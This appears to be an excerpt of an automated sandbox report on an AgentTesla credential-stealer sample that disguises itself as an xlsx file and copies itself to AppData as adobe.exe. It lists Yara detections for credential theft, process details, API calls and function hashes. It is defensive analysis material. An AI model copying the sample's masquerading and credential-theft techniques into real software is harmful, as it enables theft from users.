Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4117501266.0000000003331000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4117501266.0000000003331000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4117501266.000000000335C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4110643776.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4110643776.0000000000432000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	09:05:15
Start date:	23/07/2024
Path:	C:\Users\user\AppData\Roaming\Adobe\adobe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Imagebase:	0x860000
File size:	830'464 bytes
MD5 hash:	7DC8BA9345DE935C7B90EA6C61F3464F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:05:16
Start date:	23/07/2024
Path:	C:\Users\user\AppData\Roaming\Adobe\adobe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\adobe\adobe.exe"
Imagebase:	0x8b0000
File size:	830'464 bytes
MD5 hash:	7DC8BA9345DE935C7B90EA6C61F3464F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.4116040760.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.4116040760.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.4116040760.0000000002D0C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	77
Total number of Limit Nodes:	10

Executed Functions

Function 07E430F8 Relevance: 7.0, Strings: 5, Instructions: 739
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xbnq, xrefs: 07E43146
4'kq, xrefs: 07E437DA
Tekq, xrefs: 07E4353B
TJpq, xrefs: 07E4316E
poq, xrefs: 07E43819

Memory Dump Source

Source File: 00000000.00000002.1674991391.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e40000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: 4'kq$TJpq$Tekq$poq$xbnq
API String ID: 0-2301093937
Opcode ID: f79b2183acbc6387875f315a943b5415d0636edf7df80ee7bdc9e28628d2ffa5
Instruction ID: a8918de6a82c7d5297b78771d0147d7f05bde843194684cac597b48179e8113f
Opcode Fuzzy Hash: f79b2183acbc6387875f315a943b5415d0636edf7df80ee7bdc9e28628d2ffa5
Instruction Fuzzy Hash: FF622775A00219DFDB55DF68D984AA9BBB2FF48304F1581A8E509AB376CB31EC91CF40

Function 08383350 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675466738.0000000008380000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: true

Associated: 00000000.00000002.1675267132.0000000008300000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8300000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4ad4fe9a178d541bcc145c61169730fbb2e6825d1d288916e23a683396064af
Instruction ID: 8766590fac2b9ae200cebc95c80b3212e8db1b7ce2898654422bef7dd8146506
Opcode Fuzzy Hash: b4ad4fe9a178d541bcc145c61169730fbb2e6825d1d288916e23a683396064af
Instruction Fuzzy Hash: 20E11774E01219CFCB14DFA9D5809AEFBB2FF88305F248169E415AB356D734A941CFA1

Function 030DD41B Relevance: 6.1, APIs: 4, Instructions: 129
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 030DD49E
GetCurrentThread.KERNEL32 ref: 030DD4DB
GetCurrentProcess.KERNEL32 ref: 030DD518
GetCurrentThreadId.KERNEL32 ref: 030DD571

Memory Dump Source

Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 00fa12d16943892b7bf627e03a1bf64287bb65afea8eb8d027c266bf720de170
Instruction ID: f9e70a3be1b12a078f7370de521392b2a999e480f57f2c0e2231b4569e62daed
Opcode Fuzzy Hash: 00fa12d16943892b7bf627e03a1bf64287bb65afea8eb8d027c266bf720de170
Instruction Fuzzy Hash: 785164B09017098FDB54DFA9D548BAEFBF1AF88314F20C069E409A7260DB34A884CB65

Function 030DD420 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 030DD49E
GetCurrentThread.KERNEL32 ref: 030DD4DB
GetCurrentProcess.KERNEL32 ref: 030DD518
GetCurrentThreadId.KERNEL32 ref: 030DD571

Memory Dump Source

Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 9259f1da9b98333e35cd75c5ef536e423e4c182b74681ec5759912b44b593512
Instruction ID: 16a7230a2402f9f33a23af554d668caf1fd95dc0d71ca376c199249a92c2c171
Opcode Fuzzy Hash: 9259f1da9b98333e35cd75c5ef536e423e4c182b74681ec5759912b44b593512
Instruction Fuzzy Hash: 4D5155B09117098FDB54DFA9D548BEEFBF1AF48314F20C069E409A7260DB34A984CF65

Function 030DB1B0 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 030DB406

Memory Dump Source

Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a14b57fc65952dca99e9503cf7a18e0677b23c8162ffe9116c969600f376e584
Instruction ID: b5f35a774444a0c034c2e00e457af04cc382464320c1b193ef52c473ad5413f2
Opcode Fuzzy Hash: a14b57fc65952dca99e9503cf7a18e0677b23c8162ffe9116c969600f376e584
Instruction Fuzzy Hash: 0A714470A01B058FDB64DF2AD1447AABBF5FF88300F14892DD48ADBA50DB74E949CB94

Function 030D590C Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 030D59C9

Memory Dump Source

Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: a3d5c9df530ee20a110a895c4b11f2e303eb82a452009ae6971dd1a0aee0116a
Instruction ID: f0de6c567ea56e6cc20c59467b2477528ffcf1783f06fd81e99ef3c8cbbef37a
Opcode Fuzzy Hash: a3d5c9df530ee20a110a895c4b11f2e303eb82a452009ae6971dd1a0aee0116a
Instruction Fuzzy Hash: 8341F2B0C01729CBDB24CFA9C984BDDBBF5BF49304F24806AD809AB255DB755945CF90

Function 030D44B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 030D59C9

Memory Dump Source

Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 04cae3e43096f1e857fb724474e734d5ee8e0a9d1e4669d99966bb48279e35dc
Instruction ID: 362efdf0e6dde06d2554dbe051a16ad5d6e68a67be91b2c94e483702cf70b238
Opcode Fuzzy Hash: 04cae3e43096f1e857fb724474e734d5ee8e0a9d1e4669d99966bb48279e35dc
Instruction Fuzzy Hash: 3341DFB0C01729CBDB24CFA9C884BDEBBF5BF49304F24806AD409AB255DB756985CF90

Function 07815038 Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 078150D7

Memory Dump Source

Source File: 00000000.00000002.1674249750.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7810000_BL NBNSA240600050.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: e7a99b4fb3b4dbdef8a4a6a43fd949d62d9234919e886300232278e0b6edb350
Instruction ID: ee96ed7763562e79347472f3c3223d8132059ed62360bffc6d99974dfbc2c4d1
Opcode Fuzzy Hash: e7a99b4fb3b4dbdef8a4a6a43fd949d62d9234919e886300232278e0b6edb350
Instruction Fuzzy Hash: 3831E5B5D002499FDB10CF9AD884AEEFBF8FF58320F14842AE519A7210D775A554CFA0

Function 07815040 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 078150D7

Memory Dump Source

Source File: 00000000.00000002.1674249750.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7810000_BL NBNSA240600050.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: ad03fbbbb3d97da0b510140502b6724d72cb0c857eee851834294d62d6335081
Instruction ID: 9531767328eab557261a6594166248072515b576f44271d091ccd2bae1d4bcc3
Opcode Fuzzy Hash: ad03fbbbb3d97da0b510140502b6724d72cb0c857eee851834294d62d6335081
Instruction Fuzzy Hash: 3521C3B59002099FDB10CF9AD884ADEFBF9FB58320F14842AE519A7210D775A554CFA4

Function 030DABA0 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030DB481,00000800,00000000,00000000), ref: 030DB672

Memory Dump Source

Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f17f161deab64f1ae711bacecbc1a08931e61d28a237f7c08afbbdb191c3d314
Instruction ID: 463c78a8ad68f02f1e95807c6f94587024d8909a45cc8c56c3468eacc7493b09
Opcode Fuzzy Hash: f17f161deab64f1ae711bacecbc1a08931e61d28a237f7c08afbbdb191c3d314
Instruction Fuzzy Hash: 0B2134B68053488FCB10CFAAC484ADEBBF4EF89314F15846AD559AB211C378A544CFA5

Function 030DD668 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 030DD6EF

Memory Dump Source

Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fe1a16da700170acc1d191da0fc1d164c6f4965c7ed30da4895abfee05a06dd9
Instruction ID: 46df2f60628cfa3a060f3623d9817a63a0da1db7c123713c816bdfe6555345de
Opcode Fuzzy Hash: fe1a16da700170acc1d191da0fc1d164c6f4965c7ed30da4895abfee05a06dd9
Instruction Fuzzy Hash: 9F21E3B59002489FDB10CFAAD584ADEBBF8FF48310F14841AE918A3350D378A950CFA4

Function 030DD661 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 030DD6EF

Memory Dump Source

Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5137943410c8a63e4cc79c170dad78297dc91999720c29177753d4c4a61dbe30
Instruction ID: 46d9ff0ccb72e531dd8ce0269f82d127a39b000e5d932167fe0f09e3266d6753
Opcode Fuzzy Hash: 5137943410c8a63e4cc79c170dad78297dc91999720c29177753d4c4a61dbe30
Instruction Fuzzy Hash: 8921E0B5901208DFDB10CFA9D584AEEBBF5FF48310F14841AE958A7350D379A954CFA4

Function 030DABB8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030DB481,00000800,00000000,00000000), ref: 030DB672

Memory Dump Source

Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 63d1ef4a0b32dcb35ca40226ed84b618469b05ce839eb71710d25287d28a2602
Instruction ID: 97ee69d31d8d1629b40c207d7a19a83da18f2343e61be9ddf6bb18e9dd40b7fd
Opcode Fuzzy Hash: 63d1ef4a0b32dcb35ca40226ed84b618469b05ce839eb71710d25287d28a2602
Instruction Fuzzy Hash: 391126B69013088FCB10CF9AC444ADEFBF4EB58310F15842ED419A7310C379A544CFA4

Function 030DB603 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030DB481,00000800,00000000,00000000), ref: 030DB672

Memory Dump Source

Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6753679d83171af43bc866cface50f82c3e387bd8b4f512e64dfb6096d1e38f4
Instruction ID: 8379f30e3f4ecdfa91830ecc0a27db17289b3449aa7eda4d89c6b53a1679bf02
Opcode Fuzzy Hash: 6753679d83171af43bc866cface50f82c3e387bd8b4f512e64dfb6096d1e38f4
Instruction Fuzzy Hash: E311F3B69003499FDB10CF9AC884ADEFBF4EB48310F15842AD519A7210C779A945CFA5

Function 030DB3A0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 030DB406

Memory Dump Source

Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 052255899f8070b9134d4d5638dde4693edf23c4a2395e0d85572c23cdf210e7
Instruction ID: a0f2415650e2cee8b1a1312637a41d65519e23da0877943a24e1b9c7724b5849
Opcode Fuzzy Hash: 052255899f8070b9134d4d5638dde4693edf23c4a2395e0d85572c23cdf210e7
Instruction Fuzzy Hash: 9511E0B5C003498FCB10DF9AC544ADEFBF4AF88324F15842AD469B7610C379A545CFA5

Function 0308D36C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1671111674.000000000308D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0308D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_308d000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b950ae0a1285f60686f142f6b8b9f510ff3f923fedca699c887598ae2b55a3a5
Instruction ID: 976c0dfdd980d2cc297234e6d485804848e8d239fdd5af4ebbbc2816436d714a
Opcode Fuzzy Hash: b950ae0a1285f60686f142f6b8b9f510ff3f923fedca699c887598ae2b55a3a5
Instruction Fuzzy Hash: 14213471500200DFCB04EF14D9C4B2AFBA5FB84314F24CAADE8894B296C376D846CA61

Function 0308D1B4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1671111674.000000000308D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0308D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_308d000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c31a3eeb206b19e8d4e085cc33d1635ca9bcb910c2f3f4d9d5f281ff142284c5
Instruction ID: 17acef9c5d29306e4504e824b5896a3612348c38d3bd70d3c32e0793fbbff6f5
Opcode Fuzzy Hash: c31a3eeb206b19e8d4e085cc33d1635ca9bcb910c2f3f4d9d5f281ff142284c5
Instruction Fuzzy Hash: AE212671505300EFCB45EF14D5C0B2ABBA5FB94314F24CAADE8894B396C33AD846CB61

Function 0308D1AF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1671111674.000000000308D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0308D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_308d000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: bfe8e7aa1e408e1439de3e3847a7e3c92b611209472a718fdd57d0cd72bebf25
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: A911DA75504280CFCB42DF14D5C4B15FFB2FB94318F28C6AAD8894B696C33AD40ACBA2

Function 0308D367 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1671111674.000000000308D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0308D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_308d000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 82d19268c0874969640f6a827c43d626a9b060285794b40b6a4f7cbaa6efe977
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: D611BB75504280CFCB06DF14D5C4B15FBA2FB84318F28C6AAD8494BA96C33AE44ACB62

Function 01A5D781 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1671030995.0000000001A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a5d000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81cc2b80729d9a5128b120950722183eb7a9afa35f364f9f460a16e0c9299520
Instruction ID: e341f529350abefe1b8c050e0ffa814c838d3fa0b42097e09ab6225b85780be8
Opcode Fuzzy Hash: 81cc2b80729d9a5128b120950722183eb7a9afa35f364f9f460a16e0c9299520
Instruction Fuzzy Hash: A901F23100D3809AF7509BA9CD84B67BFA8EF41324F18C42AED090E286C238D880CAB1

Function 01A5D780 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1671030995.0000000001A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a5d000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 813594b2de38b817ec210e76a393d76ef91463fa052a1d21eab92cb5a1fd8d26
Instruction ID: 535789f01b21225c53fbfdbab25ae505211f1dc65d717d3f6be9a8a50cdd8962
Opcode Fuzzy Hash: 813594b2de38b817ec210e76a393d76ef91463fa052a1d21eab92cb5a1fd8d26
Instruction Fuzzy Hash: F2F09071409384AEE7218B1ACDC4B66FFA8EF45734F18C95AED484F286C3799844CBB1

Non-executed Functions

Function 07E430E7 Relevance: 4.1, Strings: 3, Instructions: 341COMMON

Download Yara Rule

Strings

xbnq, xrefs: 07E43146
Tekq, xrefs: 07E4353B
TJpq, xrefs: 07E4316E

Memory Dump Source

Source File: 00000000.00000002.1674991391.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e40000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: TJpq$Tekq$xbnq
API String ID: 0-3321955333
Opcode ID: da593c92f30db14b8c32bd6652185a21ef5367ac9ce78c930c19fc4dcace60e5
Instruction ID: c320b5fe31cadf75cbed45eb6cf8dec0d6c15350070dd17a8001d445368f75e2
Opcode Fuzzy Hash: da593c92f30db14b8c32bd6652185a21ef5367ac9ce78c930c19fc4dcace60e5
Instruction Fuzzy Hash: 69E144B1A016299FDB14DFA8D988B9DBBF1FF48304F1181A9E409EB251DB34AD85CF40

Function 08383788 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

6mEu, xrefs: 083837E3

Memory Dump Source

Source File: 00000000.00000002.1675466738.0000000008380000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: true

Associated: 00000000.00000002.1675267132.0000000008300000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8300000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: 6mEu
API String ID: 0-426385121
Opcode ID: 35677916984020cff39d1ef455642d4bc04125ce068a26f302b35bf4babad2e9
Instruction ID: 8e1f1626844dce8f053191775772ea5cfd20ca98f7470bc069f83bab47c7e2e5
Opcode Fuzzy Hash: 35677916984020cff39d1ef455642d4bc04125ce068a26f302b35bf4babad2e9
Instruction Fuzzy Hash: 64E1F774E01219CFCB14DFA9D580AAEFBB2FF88305F248169E415AB356D734A941CFA1

Function 07E42E87 Relevance: 1.4, Strings: 1, Instructions: 146COMMON

Download Yara Rule

Strings

4'kq, xrefs: 07E42F4B

Memory Dump Source

Source File: 00000000.00000002.1674991391.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e40000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: 4'kq
API String ID: 0-3255046985
Opcode ID: 8e736de18692983875d2f083b99d77848a8f521e96dd71d61c9534c8cf07ff7c
Instruction ID: f1e89ee3c916a6a9c0837471732c2ddfb2766430c2a120b004acc79eb7d29e84
Opcode Fuzzy Hash: 8e736de18692983875d2f083b99d77848a8f521e96dd71d61c9534c8cf07ff7c
Instruction Fuzzy Hash: 56512FB0A016098FE748EF3FF95569ABBE7FBC4300B14D539C00897269EB396905CB91

Function 07E42E98 Relevance: 1.4, Strings: 1, Instructions: 141COMMON

Download Yara Rule

Strings

4'kq, xrefs: 07E42F4B

Memory Dump Source

Source File: 00000000.00000002.1674991391.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e40000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID: 4'kq
API String ID: 0-3255046985
Opcode ID: 2c9726f7442c1f6cf5236483db5c6945620c3e537740acff831bdf8b8bd76a8d
Instruction ID: 617db223a675011039bd500547aef4c1c721b7475ffaa9467557364fd34e8d69
Opcode Fuzzy Hash: 2c9726f7442c1f6cf5236483db5c6945620c3e537740acff831bdf8b8bd76a8d
Instruction Fuzzy Hash: D05120B0A016088FE748EF7FE95569ABBE7FBC4300F14D539C00897265EB396805CB91

Function 08383BC0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675466738.0000000008380000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: true

Associated: 00000000.00000002.1675267132.0000000008300000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8300000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b33ca1875982bc55a173f8768faa8dda6043f2076c28edcf0e164ee3a965c467
Instruction ID: 684ade880d183318f738a8603c09a00e3a208c0483e8a7f37baa18677f9f6c50
Opcode Fuzzy Hash: b33ca1875982bc55a173f8768faa8dda6043f2076c28edcf0e164ee3a965c467
Instruction Fuzzy Hash: 1DE10674E01219CFCB14DFA9C5849AEBBB2FF88305F248169E419AB356D731AD41CFA1

Function 030DDFAC Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1671251005.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_30d0000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d10266a1468fb8dbdf9ab50a9a9fc7b5c1598116685ce3709eb8ac0199c2966b
Instruction ID: fd4a37a16760cf049cb8bf38ef21247944fb3341c665afc5b81854664ecc8cb7
Opcode Fuzzy Hash: d10266a1468fb8dbdf9ab50a9a9fc7b5c1598116685ce3709eb8ac0199c2966b
Instruction Fuzzy Hash: 57A14B36A013068FCF05DFA4D8445DEBBF2BF85301B19856AE906AF265DB31E956CB40

Function 07E4B518 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1674991391.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e40000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bf5a535f8324d7df9284bd4091c780532751d49971aeaf584e2eab28de52358
Instruction ID: be1a254a63bff0dc4ba63d502674fa9de7e31526c573783e7efe84b31b6e89e2
Opcode Fuzzy Hash: 9bf5a535f8324d7df9284bd4091c780532751d49971aeaf584e2eab28de52358
Instruction Fuzzy Hash: 89D1157192071ADACB01EB68DA54699F7B1FFD5300F10D79AD10937224EB70AAC4CF91

Function 083827F0 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675466738.0000000008380000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: true

Associated: 00000000.00000002.1675267132.0000000008300000.00000004.08000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8300000_BL NBNSA240600050.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab4389dc39d2ecf0ead5e6e16d7d1e99318aad563997265c166f61824099b08e
Instruction ID: 22b0917f9a337d41d6bbbb5ad428eaf60f70a6978408fbb3dac9337434b388da
Opcode Fuzzy Hash: ab4389dc39d2ecf0ead5e6e16d7d1e99318aad563997265c166f61824099b08e
Instruction Fuzzy Hash: 2D51C374E09609CFCF08DF9AD4445EEFBFAAB89301F14902AE819B7621D7349A41CF54

Analysis Process: BL NBNSA240600050.xlsx.exePID: 2912, Parent PID: 7064COMMON

Execution Graph

Execution Coverage:	11.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	178
Total number of Limit Nodes:	21

Executed Functions

Function 063D3018 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$kq, xrefs: 063D3770
$kq, xrefs: 063D3723
$kq, xrefs: 063D3740
$kq, xrefs: 063D3717
$kq, xrefs: 063D3764
$kq, xrefs: 063D374C

Memory Dump Source

